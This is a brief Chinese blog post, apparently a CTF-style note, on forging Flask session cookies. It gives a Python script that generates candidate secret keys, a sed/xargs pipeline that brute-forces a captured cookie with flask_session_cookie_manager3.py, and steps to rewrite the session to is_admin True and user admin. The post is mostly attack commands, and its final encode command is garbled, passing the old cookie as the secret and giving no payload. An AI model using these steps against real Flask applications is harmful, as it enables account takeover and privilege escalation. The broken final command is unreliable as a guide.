flask session伪造

文章介绍了使用Python生成一组随机的base64编码的secre_key,以及如何通过sed和xargs进行字符串操作,如修改Cookie值,以进行爆破攻击或管理Flask会话cookie。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

import base64,random

with open(r'E:\ser.txt','w') as f:
    for i in range(1,101):
        secret_key = 'wanbao'+base64.b64encode(str(i).encode('utf-8')).decode('utf-8')+'wanbao'
        f.write(secret_key+'\n')

生成所有可能的secre_key文件

爆破是用了哪个secre_key

cat wr.txt |sed 's/\r//;s/\n//'|xargs -i python3 flask_session_cookie_manager3.py  decode -c 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {}

#或者

sed 's/\r//;s/\n//' wr.txt|xargs -i python3 flask_session_cookie_manager3.py  decode -c 'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {} 

{'is_admin': False, 'name': 'sss', 'user_id': 2}
修改为:{'is_admin': True, 'name': 'admin', 'user_id': 1}

python3 flask_session_cookie_manager3.py  encode -s  'eyJpc19hZG1pbiI6ZmFsc2UsIm5hbWUiOiJzc3MiLCJ1c2VyX2lkIjoyfQ.ZU2SdQ.bQziiEI4D-b67LrbHpHnXUel8l4' -s {}

把生成的字符串替换Cookie值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值